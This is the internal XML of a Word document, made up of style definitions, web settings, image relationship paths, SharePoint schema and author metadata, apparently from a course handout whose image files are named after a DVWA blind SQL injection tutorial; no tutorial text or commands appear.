  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="261"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="522"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC4">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="782"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC5">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:ind w:left="1040"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC6">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:ind w:left="1300"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC7">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:ind w:left="1560"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC8">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:ind w:left="1820"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC9">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:ind w:left="2080"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentText">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CommentTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="auto"/>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locked/>
    <w:rPr>
      <w:color w:val="000000"/>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locked/>
    <w:rPr>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="35"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="0"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00ED4EBB"/>
    <w:pPr>
      <w:ind w:left="720"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentSubject">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CommentSubjectChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="auto"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>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TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="240" w:after="0" w:line="252" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
      <w:color w:val="365F91"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="txtHoaThi">
    <w:name w:val="_txtHoaThi"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:ind w:left="567" w:hanging="283"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="txtCourier">
    <w:name w:val="_txtCourier"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00C66B15"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="567" w:hanging="283"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="txtHinhVe">
    <w:name w:val="_txtHinhVe"/>
    <w:basedOn w:val="txtHoaThi"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:spacing w:before="240"/>
      <w:jc w:val="center"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="txtNoiDung">
    <w:name w:val="_txtNoiDung"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:firstLine="284"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="txtGachDong">
    <w:name w:val="_txtGachDong"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:spacing w:before="0" w:after="0" w:line="264" w:lineRule="auto"/>
      <w:ind w:left="720" w:hanging="363"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="txtSource">
    <w:name w:val="_txtSource"/>
    <w:basedOn w:val="txtCourier"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="txtTieuDe01">
    <w:name w:val="_txtTieuDe01"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="567" w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="txtTieuDe02">
    <w:name w:val="_txtTieuDe02"/>
    <w:basedOn w:val="TOCHeading"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="auto"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="txtTieuDe03">
    <w:name w:val="_txtTieuDe03"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="auto"/>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xtTaiLieuThamKhao">
    <w:name w:val="_txtTaiLieuThamKhao"/>
    <w:basedOn w:val="txtNoiDung"/>
    <w:qFormat/>
    <w:rsid w:val="00804A96"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="7"/>
      </w:numPr>
      <w:ind w:left="567" w:hanging="567"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00804A96"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="txtCommand">
    <w:name w:val="_txtCommand"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="008A1FD0"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="240" w:line="276" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>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96709">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1886411704">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="364523062">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="823084457">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1098673741">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1142498028">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="979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276">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1905410097">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="2000574760">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1896509128">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1012269269">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1599018648">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="622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file:///D:\How%20to%20Exploit%20DVWA%20Blind%20SQL%20Injection%20(SQLi)%20with%20SQLMap%20and%20Burp%20Suite%20_%20by%20Hashsleuth%20Info%20_%20Medium_files\1_-UAn7bGd0aO4W2X8H-nbig.pn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file:///D:\How%20to%20Exploit%20DVWA%20Blind%20SQL%20Injection%20(SQLi)%20with%20SQLMap%20and%20Burp%20Suite%20_%20by%20Hashsleuth%20Info%20_%20Medium_files\1_xQgPsVR0ZR0fxYf6St8zcg.png" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="file:///D:\How%20to%20Exploit%20DVWA%20Blind%20SQL%20Injection%20(SQLi)%20with%20SQLMap%20and%20Burp%20Suite%20_%20by%20Hashsleuth%20Info%20_%20Medium_files\1_aVa8JX6mKDyw4OlzjFQoCQ.png" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="file:///D:\How%20to%20Exploit%20DVWA%20Blind%20SQL%20Injection%20(SQLi)%20with%20SQLMap%20and%20Burp%20Suite%20_%20by%20Hashsleuth%20Info%20_%20Medium_files\1_YWz3FmCz7Sc4lECiH3ZRVA.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file:///D:\How%20to%20Exploit%20DVWA%20Blind%20SQL%20Injection%20(SQLi)%20with%20SQLMap%20and%20Burp%20Suite%20_%20by%20Hashsleuth%20Info%20_%20Medium_files\1_GT6TDpjaHXtPIplQ9FZplA.png"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file:///D:\How%20to%20Exploit%20DVWA%20Blind%20SQL%20Injection%20(SQLi)%20with%20SQLMap%20and%20Burp%20Suite%20_%20by%20Hashsleuth%20Info%20_%20Medium_files\1_OKx38RRGzG63qgrgRNjxkw.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How%20to%20Exploit%20DVWA%20Blind%20SQL%20Injection%20(SQLi)%20with%20SQLMap%20and%20Burp%20Suite%20_%20by%20Hashsleuth%20Info%20_%20Medium_files\1_2xRL3i6rqQdqIU-FDZcylg.p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C8EA341C65F439DF36CA1354CD8F6" ma:contentTypeVersion="18" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="be707d8df9d3693c99b28dd6528cf6c8">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="cde614ba-fb6a-4eaf-9df4-43af8ee3c594" xmlns:ns4="42f11bd1-d4d0-411a-889a-04eb067cfc24" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="de6486cfe1ef6e00220f84c676ee60ed" ns3:_="" ns4:_="">
    <xsd:import namespace="cde614ba-fb6a-4eaf-9df4-43af8ee3c594"/>
    <xsd:import namespace="42f11bd1-d4d0-411a-889a-04eb067cfc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614ba-fb6a-4eaf-9df4-43af8ee3c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f11bd1-d4d0-411a-889a-04eb067cfc2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de614ba-fb6a-4eaf-9df4-43af8ee3c594" xsi:nil="true"/>
  </documentManagement>
</p:properties>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{02762555-A7B1-40B0-B858-F59FBD754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e614ba-fb6a-4eaf-9df4-43af8ee3c594"/>
    <ds:schemaRef ds:uri="42f11bd1-d4d0-411a-889a-04eb067cf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89AD92-E2C4-4404-ACC8-D39FDD03D364}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{3105B37D-E4E5-4DD6-A81D-9B08E2A98F52}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="cde614ba-fb6a-4eaf-9df4-43af8ee3c594"/>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42f11bd1-d4d0-411a-889a-04eb067cfc2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1506</Words>
  <Characters>9843</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>82</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Nguyen Tan Khoi</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>ntkhoi@dut.udn.vn</cp:lastModifiedBy>
  <cp:revision>15</cp:revision>
  <cp:lastPrinted>2024-01-08T02:40:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-08-26T10:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-08-26T11:15:00Z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0x010100CF6C8EA341C65F439DF36CA1354CD8F6</vt:lpwstr>
  </property>
</Properties>
</file>